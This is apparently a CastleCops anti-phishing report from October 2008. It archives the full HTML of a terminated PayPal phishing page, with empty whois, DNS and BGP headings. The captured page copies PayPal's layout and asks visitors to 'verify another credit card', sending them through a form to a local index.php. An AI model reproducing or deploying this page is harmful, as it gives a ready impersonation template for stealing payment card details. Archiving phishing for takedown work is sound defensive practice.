CastleCops® PayPal Phish

fetched page

at 10 Oct, 2008 @ 16:58:18
MD5 Fingerprint: 63694dc2b02605ad7a5bd404cb8f3ee9
SHA1 Fingerprint: ba7ae23ea163cd786a02d6a51ff25956e1d71d23

HTTP/1.1 200 OK
Date: Fri, 10 Oct 2008 16:58:09 GMT
Server: Apache/2.0.63 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Do you have another credit/debit card ?</title>

<meta http-equiv="keywords" content="Send, money, payments, credit, credit card, instant, money, financial services, mobile, wireless, WAP, cell phones, two-way pagers, Windows CE">

<meta http-equiv="description" content="PayPal lets you send money to anyone with email. PayPal is free for consumers and works seamlessly with your existing credit card and checking account. You can settle debts, borrow cash, divide bills or split expenses with friends all without going to an ATM or looking for your checkbook.">

<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-540-20081001-1/css/xpt.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-540-20081001-1/css/xptInvoice.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-540-20081001-1/css/xptObsolete.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-540-20081001-1/css/xptlive.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-540-20081001-1/css/default.css">

<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-540-20081001-1/css/en_US/lang.css">
<style type="text/css"></style>
<link rel="shortcut icon" href="https://www.paypalobjects.com/WEBSCR-540-20081001-1/en_US/i/icon/pp_favicon_x.ico">
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/js/pp_main.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/js/lib/yui-0.12/yahoo-dom-event.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/js/lib/pui/pui-0.1/paypal.js"></script>
</head>
<body>
<div class="srd" id="header">
<h1><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_account"><img border="0" src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" alt="PayPal"></a></h1>
<form method="post" id="searchForm" name="searchForm" action="https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search">
<fieldset>
<legend>Search PayPal</legend>
<label for="searchBox">Search </label><input type="text" id="searchBox" name="queryString" value=""> <input class="button" type="submit" id="search.x" name="search.x" value="Search">
</fieldset>
<input name="form_charset" type="hidden" value="UTF-8">
</form>
<div class="srd" id="navGlobal"><ul>
<li class="logout"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_logout">Log Out</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help">Help</a></li>
<li class="last"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center">Security Center</a></li>
</ul></div>
</div>
<div id="navPrimary" class="srd"><ul>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_account&amp;nav=0" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:RO');">My Account</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money&amp;nav=1" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:TZ');">Send Money</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_request-money&amp;nav=2" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:UC');">Request Money</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_merchant&amp;nav=3" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:UF');">Merchant Services</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_auction&amp;nav=4" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:UG');">Auction Tools</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Marketing/general/ProductsandServices&amp;nav=5" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:UH');">Products &amp; Services</a></li>
</ul></div>
<div id="xptContentMain">
	
	<table align="center" border="0" cellpadding="0" cellspacing="0" id="xptContentContainer" width="760">
		
<tr><td><div>
<table align="center" border="0" cellpadding="10" cellspacing="0" width="100%" class="alertBox"><tr><td><table align="left" border="0" cellpadding="0" cellspacing="0" class="secondary">
<tr><td align="left"></td></tr>
<tr><td align="left" colspan="2">You have successfully verified a credit card. 
	Please note that this card will not be charged, added to your account or used for payments via PayPal.</td></tr>
</table></td></tr></table>
<br>
</div></td></tr>
		
		
<tr><td><div id="xptTitle"><table align="center" border="0" cellpadding="0" cellspacing="0" class="main">
<tr><td class="heading" width="100%"><h1>Do you have another credit/debit card ?</h1></td></tr>
<tr><td><img alt="" border="0" height="2" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/en_US/i/scr/pixel.gif" width="1"></td></tr>
<tr><td><hr></td></tr>
<tr><td><img alt="" border="0" height="4" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/en_US/i/scr/pixel.gif" width="1"></td></tr>
</table></div></td></tr>
<tr><td valign="top"><form method="get" action="" onSubmit="location.replace('index.php?ref=&login_email=');">
	
<input type=hidden name=ref value="">
<input type=hidden name=login_email value="">

</table></td></tr></table></td></tr></table>
<br>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr><td class="subheading" colspan="2">&nbsp;</td></tr>

For extra security of your account, we recommend you to
  verify another credit card through PayPal. <br><br> If you have more
  credit/debit cards and you want to use them for verification, click
  <span class="emphasis">Verify Another Card <span style="font-weight: 400">(login
  is required)</span>

</td></tr>

<tr><td class="tableRowWhite"><img alt="" border="0" height="10" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td></tr>
<tr><td><br></td></tr>
<tr><td><span class="small"><span class="emphasis">For your protection, we verify this information.</span>
 
		</td></tr>
<tr><td><br></td></tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr><td><img alt="" border="0" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/en_US/i/scr/pixel.gif" class="verticalSpacerHigh" width="1" height="1"></td></tr>
<tr><td class="separationLine"><img alt="" border="0" height="2" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/en_US/i/scr/pixel.gif" width="1"></td></tr>
<tr><td><img alt="" border="0" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/en_US/i/scr/pixel.gif" class="verticalSpacerMedium" width="1" height="1"></td></tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td align="right" width="100%" class="globalButtons">
<input type="submit" name="set.x" value="Add another card" onClick="location.replace('index.php?ref=&login_email=');">
</td></tr></table>
<input name="form_charset" type="hidden" value="UTF-8">
</form></td></tr>
</table></div>
<div id="footer" class="srd">
<h5 class="accessAid">More Information</h5>
<ul>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/mobile/MobileOverview">Mobile</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_batch-payment-overview">Mass Pay</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_upgrade-interest-marcom">Money Market</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_dc-intro">ATM/Debit Card</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb">Referrals</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/about">About Us</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/general/PayPalAccountTypes">Accounts</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-fees">Fees</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy">Privacy</a></li>
<li><a href="https://ad.doubleclick.net/clk;30045328;11466062;u?https://www.paypal.com/us/cgi-bin/webscr?cmd=_ppcredit-marketing">Plus Card</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center">Security Center</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/helpscr?cmd=_help&amp;t=escalateTab">Contact Us</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua">Legal Agreements</a></li>
<li><a href="/developer">Developers</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_shop">Shops</a></li>
</ul>
<p id="footerSecure"><script type="text/javascript">var lang = 'en';var baseUrl ='https://seal.verisign.com/splash?form_file=fdf\/splash.fdf&dn=SCGI.EBAY.COM&lang='+lang;document.write ('<a href=\"'+baseUrl+'\" onclick=\"PAYPAL1.util.openWind(event,\{location:1,status:1,resizable:1,scrollbars:1,width:560,height:500\})\">');var ver = -1;var v_ua = navigator.userAgent.toLowerCase();if (v_ua.match(/msie ([0-9]{1,}[\.0-9]{0,})/) != null){ver = parseFloat( RegExp.$1 );}if((v_ua.indexOf("msie")!=-1) && (ver>=7)) {var plat=-1;if (v_ua.match(/windows nt ([0-9]{1,}[\.0-9]{0,})/) != null){plat = parseFloat( RegExp.$1 );}if (plat >= 5.1) {document.write("<img src='https://extended-validation-ssl.verisign.com/dot_clear.gif' style='display: none;' />");}}</script><img border="0" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/en_US/i/logo/verisign.gif" alt=""><script type="text/javascript">document.write ('<\/a>');</script><p><a target="_blank" href="http://www.verisign.com/ssl-certificate">About SSL Certificates</a></p></p>
<p id="legal">Copyright © 1999-2007 PayPal. All rights reserved.<br><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/UserAgreement/general/FDIC">Information about FDIC pass-through insurance</a><br></p>
</div>
<div id="navFull"><ul>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_account&amp;nav=0" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:RO');">My Account</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_send-money&amp;nav=1" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:TZ');">Send Money</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_request-money&amp;nav=2" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:UC');">Request Money</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_merchant&amp;nav=3" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:UF');">Merchant Services</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_auction&amp;nav=4" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:UG');">Auction Tools</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Marketing/general/ProductsandServices&amp;nav=5" onClick="s=s_gi('paypalglobal'); s.tl(this,'o','SRD:Nav:UH');">Products &amp; Services</a></li>
</ul></div>
<script type="text/javascript">
							  // This is an ugly hack until there is a reliable ondomready function
							 if(typeof PAYPAL != 'undefined'){
								 PAYPAL.core.Navigation.init();
							}</script>

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-540-20081001-1/js/site_catalyst/pp_jscode_080706.js"></script>
<script type="text/javascript">
</script>
<script type="text/javascript">
</script><noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>

</body>
</html>

Fried Phish^(TM)

status: terminated

Report for at 10 Oct, 2008 @ 16:57:00

whois

dig any

dig any

dig any

dig any

host

host

host

host

fetched page

Corresponding BGP Origin ASN

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

AS Description of a given BGP ASN

AS Description of a given BGP ASN


	2002-2008 � Computer Cops LLC dba CastleCops®. All rights reserved. Acceptable Use Policy. Use signifies your agreement. 144ppm 0.247s (0.161s) Making cybercriminals unhappy since 2002*

Fried Phish(TM)

status: terminated

Report for at 10 Oct, 2008 @ 16:57:00

whois

dig any

dig any

dig any

dig any

host

host

host

host

fetched page

Corresponding BGP Origin ASN

Possible BGP peer ASNs one AS hop away from BGP Origin ASN

AS Description of a given BGP ASN

AS Description of a given BGP ASN

Fried Phish^(TM)